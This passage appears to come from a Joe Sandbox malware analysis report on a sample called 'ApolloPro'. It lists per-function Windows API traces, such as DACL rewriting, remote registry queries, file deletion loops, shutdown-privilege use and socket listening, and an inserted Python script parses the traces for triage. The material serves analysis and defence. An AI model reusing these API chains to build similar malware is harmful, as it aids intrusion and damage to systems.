• Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
Similarity
• API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
• String ID: *.*$ji
• API String ID: 1824444939-474203043
• Opcode ID: 62018e311f205439834fcef22d31eaffdc5a3b056182f0d3b67e399b68c6e6b7
• Instruction ID: 91184324ab209cf88fca898b5f93d825714ddf9966f57437b08d919a491e53dc
• Opcode Fuzzy Hash: 62018e311f205439834fcef22d31eaffdc5a3b056182f0d3b67e399b68c6e6b7
• Instruction Fuzzy Hash: C131F67190125AAAEF509FB4EC48EEE77BEDF09321F110165F804E36A0DB70CE458A64
APIs
  • Part of subcall function 00688E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00688E3C
  • Part of subcall function 00688E20: GetLastError.KERNEL32(?,00688900,?,?,?), ref: 00688E46
  • Part of subcall function 00688E20: GetProcessHeap.KERNEL32(00000008,?,?,00688900,?,?,?), ref: 00688E55
  • Part of subcall function 00688E20: HeapAlloc.KERNEL32(00000000,?,00688900,?,?,?), ref: 00688E5C
  • Part of subcall function 00688E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00688E73
  • Part of subcall function 00688EBD: GetProcessHeap.KERNEL32(00000008,00688916,00000000,00000000,?,00688916,?), ref: 00688EC9
  • Part of subcall function 00688EBD: HeapAlloc.KERNEL32(00000000,?,00688916,?), ref: 00688ED0
  • Part of subcall function 00688EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00688916,?), ref: 00688EE1
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00688931
• _memset.LIBCMT ref: 00688946
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00688965
                                                                                              • GetLengthSid.ADVAPI32(?), ref: 00688976
                                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 006889B3
                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 006889CF
                                                                                              • GetLengthSid.ADVAPI32(?), ref: 006889EC
                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 006889FB
                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00688A02
                                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00688A23
                                                                                              • CopySid.ADVAPI32(00000000), ref: 00688A2A
                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00688A5B
                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00688A81
                                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00688A95
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                              • String ID:
                                                                                              • API String ID: 3996160137-0
                                                                                              • Opcode ID: ca1057b130313c1d0bbcc12b5f01fd4d7dc5922c4a7ce2d1946f8162f9c7338e
                                                                                              • Instruction ID: dafc0525ad2a37c8a9a031965d04bd0cbff24c0bf75b309ae9ae549941779b62
                                                                                              • Opcode Fuzzy Hash: ca1057b130313c1d0bbcc12b5f01fd4d7dc5922c4a7ce2d1946f8162f9c7338e
                                                                                              • Instruction Fuzzy Hash: 82611775A00209FFDF04EFA5DC45EEEBB7ABF44304F44826AE915A7290DB359A05CB60
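The per-function listing in this report is regular enough to parse: each entry opens with an `APIs` header, lists direct calls and "Part of subcall function" calls with module and ref address, then gives the dump source, base offset and similarity IDs. What follows is an added example, not part of the Joe Sandbox report or its tooling: a Python script that extracts those fields, orders each function's direct calls by ref address (the listing itself is not always address-ordered), and flags API combinations a triager would look at first, such as the AddAce/SetUserObjectSecurity rewrite of a user-object DACL in the entry just above, or the AdjustTokenPrivileges/ExitWindowsEx pair that appears later in this listing. The watchlist labels are my own; the sample text is constructed from a few entries of this listing, trimmed, with hashes shortened.

```python
"""Extract per-function API sequences from Joe Sandbox IDA-plugin listings."""
import re
from dataclasses import dataclass, field

# Constructed sample (hypothetical): three entries in the same shape as the
# report listing, trimmed to a few lines each, Opcode IDs shortened.
SAMPLE = """\
APIs
  • Part of subcall function 00688E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00688E3C
  • Part of subcall function 00688E20: GetLastError.KERNEL32 ref: 00688E46
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00688931
• _memset.LIBCMT ref: 00688946
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 006889CF
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00688A81
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00688A95
Memory Dump Source
• Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
Similarity
• API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl
• String ID:
• Opcode ID: ca1057b1
APIs
  • Part of subcall function 00689399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006893E3
  • Part of subcall function 00689399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00689410
• ExitWindowsEx.USER32(?,00000000), ref: 006957B4
Memory Dump Source
• Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
Similarity
• API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
• String ID:
• Opcode ID: 6f1e2d3c
APIs
• FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0069FA83
• FindClose.KERNEL32(00000000), ref: 0069FB96
• Sleep.KERNEL32(0000000A), ref: 0069FAB3
• FindNextFileW.KERNEL32(?,?), ref: 0069FB80
Memory Dump Source
• Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
Similarity
• API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
• String ID: *.*
• Opcode ID: 7f0f7716
"""

# Call lines: "• Name.MODULE(args), ref: ADDR"; args are optional (e.g. "_memset.LIBCMT ref: ...").
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
SRC_RE = re.compile(r"^•\s*Source File:\s*(?P<dump>\S+),\s*Offset:\s*(?P<base>[0-9A-Fa-f]+)")

# (label, APIs that must all appear, directly or via a subcall) -- my own triage watchlist.
WATCHLIST = [
    ("user-object DACL rewrite (window station/desktop access)", {"AddAce", "SetUserObjectSecurity"}),
    ("privilege adjust followed by shutdown/reboot", {"AdjustTokenPrivileges", "ExitWindowsEx"}),
    ("remote registry access", {"RegConnectRegistryW"}),
    ("directory enumeration with delete", {"FindFirstFileW", "DeleteFileW"}),
    ("directory enumeration", {"FindFirstFileW", "FindNextFileW"}),
]


@dataclass
class FunctionEntry:
    dump: str = ""
    base: str = ""
    api_id: str = ""
    opcode_id: str = ""
    calls: list = field(default_factory=list)     # direct calls: (name, module, ref)
    subcalls: list = field(default_factory=list)  # via callee: (callee, name, module, ref)

    def api_names(self) -> set:
        return {c[0] for c in self.calls} | {c[1] for c in self.subcalls}


def parse_entries(text: str) -> list:
    """Split the listing into FunctionEntry objects; each 'APIs' header opens a new one."""
    entries, cur = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            cur = FunctionEntry()
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            if m["sub"]:
                cur.subcalls.append((m["sub"], m["name"], m["module"], m["ref"]))
            else:
                cur.calls.append((m["name"], m["module"], m["ref"]))
            continue
        m = SRC_RE.match(s)
        if m:
            cur.dump, cur.base = m["dump"], m["base"]
        elif s.startswith("• API ID:"):
            cur.api_id = s.split(":", 1)[1].strip()
        elif s.startswith("• Opcode ID:"):
            cur.opcode_id = s.split(":", 1)[1].strip()
    return entries


def call_sequence(entry: FunctionEntry) -> list:
    """Direct calls in address order; the report lists them in its own order, not by ref."""
    return [name for name, _mod, _ref in sorted(entry.calls, key=lambda c: int(c[2], 16))]


def flag(entry: FunctionEntry) -> list:
    """Watchlist labels whose required APIs all occur in this function (direct or subcall)."""
    names = entry.api_names()
    return [label for label, needed in WATCHLIST if needed <= names]


def report(text: str) -> list:
    """One summary dict per function entry, ready to sort by flags for triage."""
    return [{
        "base": e.base,
        "opcode_id": e.opcode_id,
        "sequence": call_sequence(e),
        "subcall_apis": sorted({c[1] for c in e.subcalls}),
        "flags": flag(e),
    } for e in parse_entries(text)]


if __name__ == "__main__":
    for row in report(SAMPLE):
        print(row["opcode_id"], row["flags"], " -> ".join(row["sequence"]))
```

Run it over the saved text of this section to get every function's address-ordered API chain alongside its Opcode ID; the flagged rows are the ones worth opening in the dump first, and the Opcode ID lets you match the same function across other reports of the same family.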
                                                                                              APIs
                                                                                                • Part of subcall function 006B147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006B040D,?,?), ref: 006B1491
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006B0B0C
                                                                                                • Part of subcall function 00634D37: __itow.LIBCMT ref: 00634D62
                                                                                                • Part of subcall function 00634D37: __swprintf.LIBCMT ref: 00634DAC
                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 006B0BAB
                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 006B0C43
                                                                                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 006B0E82
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 006B0E8F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                              • String ID:
                                                                                              • API String ID: 1240663315-0
                                                                                              • Opcode ID: 2ff0c9536257dbdf4ad70743e14d3e977518fb7847b5a406a7b551a94fbd96bb
                                                                                              • Instruction ID: aa83fb539999d0a754adb11ff4226fadc66f6e6f37ddee76367728fcc0bd72f5
                                                                                              • Opcode Fuzzy Hash: 2ff0c9536257dbdf4ad70743e14d3e977518fb7847b5a406a7b551a94fbd96bb
                                                                                              • Instruction Fuzzy Hash: 4EE16C71604210AFDB54DF24C895E6BBBEAEF89314F04896DF849DB2A1DB30EC41CB55
                                                                                              APIs
                                                                                              • __swprintf.LIBCMT ref: 00694451
                                                                                              • __swprintf.LIBCMT ref: 0069445E
                                                                                                • Part of subcall function 006538C8: __woutput_l.LIBCMT ref: 00653921
                                                                                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 00694488
                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 00694494
                                                                                              • LockResource.KERNEL32(00000000), ref: 006944A1
                                                                                              • FindResourceW.KERNEL32(?,?,00000003), ref: 006944C1
                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 006944D3
                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 006944E2
                                                                                              • LockResource.KERNEL32(?), ref: 006944EE
                                                                                              • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0069454F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                              • String ID:
                                                                                              • API String ID: 1433390588-0
                                                                                              • Opcode ID: e496ee3c18de49a63cf8b087b7f269a8ff18d454601a773cb9c3a1a6ba8ca9d6
                                                                                              • Instruction ID: 923b0e99c54f089537c14760f28a2e4116e15a13edcc546c8aec78790e1156b6
                                                                                              • Opcode Fuzzy Hash: e496ee3c18de49a63cf8b087b7f269a8ff18d454601a773cb9c3a1a6ba8ca9d6
                                                                                              • Instruction Fuzzy Hash: E3316E7150121AAFDF119FA0ED48EBB7BAEEF08341F004415F915D7650EB34DA22CB60
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                              • String ID:
                                                                                              • API String ID: 1737998785-0
                                                                                              • Opcode ID: ab09be5cb5b6c5e219973cd94dcd7c8a53be87267c0c05be4b99a6488c3e97ae
                                                                                              • Instruction ID: 63130e11166b99643ae927b19a1ead680ff482df77baff279efeb4bc07eddbc1
                                                                                              • Opcode Fuzzy Hash: ab09be5cb5b6c5e219973cd94dcd7c8a53be87267c0c05be4b99a6488c3e97ae
                                                                                              • Instruction Fuzzy Hash: D0218B31201210DFEB41AF25EC09F7EB7AAEF84721F108019F9469B2A1CB74AD118B98
                                                                                              APIs
                                                                                                • Part of subcall function 00650284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00642A58,?,00008000), ref: 006502A4
                                                                                                • Part of subcall function 00694FEC: GetFileAttributesW.KERNEL32(?,00693BFE), ref: 00694FED
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00693D96
                                                                                              • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00693E3E
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00693E51
                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00693E6E
                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00693E90
                                                                                              • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00693EAC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                              • String ID: \*.*
                                                                                              • API String ID: 4002782344-1173974218
                                                                                              • Opcode ID: 6e5d2b3e7ded324dcf065da321d0bb6ccff963f9e3303341bedb24bd3e014114
                                                                                              • Instruction ID: b24b9c13687896c054c8445316ac7bd36ca3aee7c68256c19217ba7ea52f2a3a
                                                                                              • Opcode Fuzzy Hash: 6e5d2b3e7ded324dcf065da321d0bb6ccff963f9e3303341bedb24bd3e014114
                                                                                              • Instruction Fuzzy Hash: 1751603180115DAACF55EBA0D992DEEB77BAF12301F200169E442BB291EF356F49CB64
                                                                                              APIs
                                                                                                • Part of subcall function 00641A36: _memmove.LIBCMT ref: 00641A77
                                                                                              • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0069FA83
                                                                                              • FindClose.KERNEL32(00000000), ref: 0069FB96
                                                                                                • Part of subcall function 006352B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006352E6
                                                                                              • Sleep.KERNEL32(0000000A), ref: 0069FAB3
                                                                                              • _wcscmp.LIBCMT ref: 0069FAC7
                                                                                              • _wcscmp.LIBCMT ref: 0069FAE2
                                                                                              • FindNextFileW.KERNEL32(?,?), ref: 0069FB80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                                                                              • String ID: *.*
                                                                                              • API String ID: 2185952417-438819550
                                                                                              • Opcode ID: 7f0f77160417ce5b0c6c2e7d7db392f3f53093ca6d489960c70f066328c4419f
                                                                                              • Instruction ID: adc13e01c3fc518325ceace902a1ec7f8e2342532d57ea91eba920aefdccc50d
                                                                                              • Opcode Fuzzy Hash: 7f0f77160417ce5b0c6c2e7d7db392f3f53093ca6d489960c70f066328c4419f
                                                                                              • Instruction Fuzzy Hash: 3441A17190021AAFDF54DF64CC59AEEBBBAFF05354F14416AE814E7690EB309E84CB90
                                                                                              APIs
                                                                                                • Part of subcall function 00650284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00642A58,?,00008000), ref: 006502A4
                                                                                                • Part of subcall function 00694FEC: GetFileAttributesW.KERNEL32(?,00693BFE), ref: 00694FED
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0069407C
                                                                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 006940CC
                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 006940DD
                                                                                              • FindClose.KERNEL32(00000000), ref: 006940F4
                                                                                              • FindClose.KERNEL32(00000000), ref: 006940FD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                              • String ID: \*.*
                                                                                              • API String ID: 2649000838-1173974218
                                                                                              • Opcode ID: 6854fc7ecd9ef9d09c4ed7d616c11815ca0cea91786161f01b5b5cae4109ed2d
                                                                                              • Instruction ID: a8cce21f0450c4391a601195d8672529255ea9e47d9bb7475f6678d9cd80fc70
                                                                                              • Opcode Fuzzy Hash: 6854fc7ecd9ef9d09c4ed7d616c11815ca0cea91786161f01b5b5cae4109ed2d
                                                                                              • Instruction Fuzzy Hash: B63181310093859BC740EB60D895CEFB7AEBE92304F440A1DF5E183291EF25DA4AC767
                                                                                              APIs
                                                                                                • Part of subcall function 00689399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006893E3
                                                                                                • Part of subcall function 00689399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00689410
                                                                                                • Part of subcall function 00689399: GetLastError.KERNEL32 ref: 0068941D
                                                                                              • ExitWindowsEx.USER32(?,00000000), ref: 006957B4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                              • String ID: $@$SeShutdownPrivilege
                                                                                              • API String ID: 2234035333-194228
                                                                                              • Opcode ID: b907e4f76a00c13f2fb21a1348981f17ef40b2b80d87c8b9761a7bab4673d714
                                                                                              • Instruction ID: a3cffcf4d02095b5ad11cafa299dca5f26cbd9e21aa091e6a5131e5501b4d57e
                                                                                              • Opcode Fuzzy Hash: b907e4f76a00c13f2fb21a1348981f17ef40b2b80d87c8b9761a7bab4673d714
                                                                                              • Instruction Fuzzy Hash: 3C01D431650712EAEF6962E49C8AFFB725EAB04750F140529F817DAAE2DA505D048364
                                                                                              APIs
                                                                                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 006A69C7
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 006A69D6
                                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 006A69F2
                                                                                              • listen.WSOCK32(00000000,00000005), ref: 006A6A01
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 006A6A1B
                                                                                              • closesocket.WSOCK32(00000000,00000000), ref: 006A6A2F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                              • String ID:
                                                                                              • API String ID: 1279440585-0
                                                                                              • Opcode ID: 114026140970e9dfba602efa336b36c9552398d038d803f2a285a1a9e83b8e1f
                                                                                              • Instruction ID: a16c0a540fc8ed2527cac7db0a49c6dbd83595acb8527bd2d619fbe41ee22dd0
                                                                                              • Opcode Fuzzy Hash: 114026140970e9dfba602efa336b36c9552398d038d803f2a285a1a9e83b8e1f
                                                                                              • Instruction Fuzzy Hash: 3821CE346006019FDB00FF68C889E6EB7AAEF45724F18815CF956A7391CB70AC01CFA0
                                                                                              APIs
                                                                                                • Part of subcall function 006329E2: GetWindowLongW.USER32(?,000000EB), ref: 006329F3
                                                                                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 00631DD6
                                                                                              • GetSysColor.USER32(0000000F), ref: 00631E2A
                                                                                              • SetBkColor.GDI32(?,00000000), ref: 00631E3D
                                                                                                • Part of subcall function 0063166C: DefDlgProcW.USER32(?,00000020,?), ref: 006316B4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ColorProc$LongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3744519093-0
                                                                                              • Opcode ID: fe14833c209d5809e81b2621ed6971ca860fce43af7ebdcd0f19a7ac099a3b6d
                                                                                              • Instruction ID: acb07a13020079d5297a99bb2ae49fc3256e408c36eef904bea3db97631e525e
                                                                                              • Opcode Fuzzy Hash: fe14833c209d5809e81b2621ed6971ca860fce43af7ebdcd0f19a7ac099a3b6d
                                                                                              • Instruction Fuzzy Hash: 54A114B0115404FAE728AB698C49EFB299FDF43311F14211EF442DE291CB259E82D6FA
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0069C329
                                                                                              • _wcscmp.LIBCMT ref: 0069C359
                                                                                              • _wcscmp.LIBCMT ref: 0069C36E
                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0069C37F
                                                                                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0069C3AF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
